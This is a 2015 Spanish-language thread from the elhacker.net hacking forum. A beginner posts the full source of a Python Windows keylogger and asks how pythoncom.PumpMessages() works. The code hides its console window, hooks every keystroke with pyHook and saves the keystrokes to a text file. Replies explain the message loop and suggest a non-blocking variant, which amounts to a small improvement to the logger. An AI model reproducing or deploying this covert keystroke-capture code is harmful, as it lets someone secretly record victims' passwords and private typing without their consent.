elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  duda con keylogger
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: duda con keylogger  (Leído 2,320 veces)
seyco

Desconectado Desconectado

Mensajes: 7


Ver Perfil
duda con keylogger
« en: 27 Agosto 2015, 23:56 pm »

recien estoy iniciando a aprender python y encontre este codigo de keylogger, no logro entender bien como funciona el ptyhoncom.pumpmessages().

Código:
import win32api
import win32console
import win32gui
import pythoncom,pyHook
 
win=win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)
 
def OnKeyboardEvent(event):
if event.Ascii==5:
_exit(1)
if event.Ascii !=0 or 8:
#open output.txt to read current keystrokes
f=open('c:\output.txt','r+')
buffer=f.read()
f.close()
#open output.txt to write current + new keystrokes
f=open('c:\output.txt','w')
keylogs=chr(event.Ascii)
if event.Ascii==13:
keylogs='/n'
buffer+=keylogs
f.write(buffer)
f.close()
# create a hook manager object
hm=pyHook.HookManager()
hm.KeyDown=OnKeyboardEvent
# set the hook
hm.HookKeyboard()
# wait forever
pythoncom.PumpMessages()

segun lo poco que entendi de pythoncom.PumpMessages(), espera hasta que reciba otra tecla presionada pero, y luego vuelve a iniciar todo el codigo o que pasa?


En línea

Br1ant


Desconectado Desconectado

Mensajes: 791


Incluso la "nada" es un "algo"


Ver Perfil WWW
Re: duda con keylogger
« Respuesta #1 en: 28 Agosto 2015, 02:06 am »

Si vas a publicar código, utiliza las etiquetas GeSHi o modifica la primera etiqueta para que quede como code=python.



pythoncom.PumpMessages() simplemente se ejecuta continuamente y, por lo tanto, no requiere reiniciar todo el código.


« Última modificación: 28 Agosto 2015, 02:08 am por hashph » En línea

Namasté, criatura.
seyco

Desconectado Desconectado

Mensajes: 7


Ver Perfil
Re: duda con keylogger
« Respuesta #2 en: 28 Agosto 2015, 20:17 pm »

osea solo se queda ejecutando esa ultima linea de codigo? que pasa cuando se recibe el evento de la tecla presionada
En línea

tincopasan


Desconectado Desconectado

Mensajes: 1.286

No es lo mismo conocer el camino que recorrerlo.


Ver Perfil
Re: duda con keylogger
« Respuesta #3 en: 28 Agosto 2015, 21:37 pm »

está más que bien que no conozcas la función, pero... si quieres saber que hace el script, o sea como funciona si tiene loops o condicionales, etc, debugealo, pon un bp y sigue paso a paso cada línea.

ah y podrías usar
Código
  1.  while True: # código, pythoncom.PumpWaitingMessages()
para no bloquear la ejecución.
« Última modificación: 28 Agosto 2015, 21:43 pm por tincopasan » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Duda con Keylogger C++
Análisis y Diseño de Malware
WiseHidden 9 5,290 Último mensaje 12 Junio 2011, 21:01 pm
por BlackZeroX
Duda con el Keylogger
Hacking
ayudaxfavor 5 3,701 Último mensaje 19 Diciembre 2012, 01:33 am
por simorg
[Duda] Construir un keylogger
Hacking
Dacan 0 1,860 Último mensaje 6 Febrero 2016, 20:05 pm
por Dacan
duda keylogger web
Hacking
T1cxT4c 0 2,048 Último mensaje 9 Noviembre 2017, 04:05 am
por T1cxT4c
Duda con Keylogger
Análisis y Diseño de Malware
Guty18 1 2,233 Último mensaje 28 Junio 2018, 17:24 pm
por Flamer
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines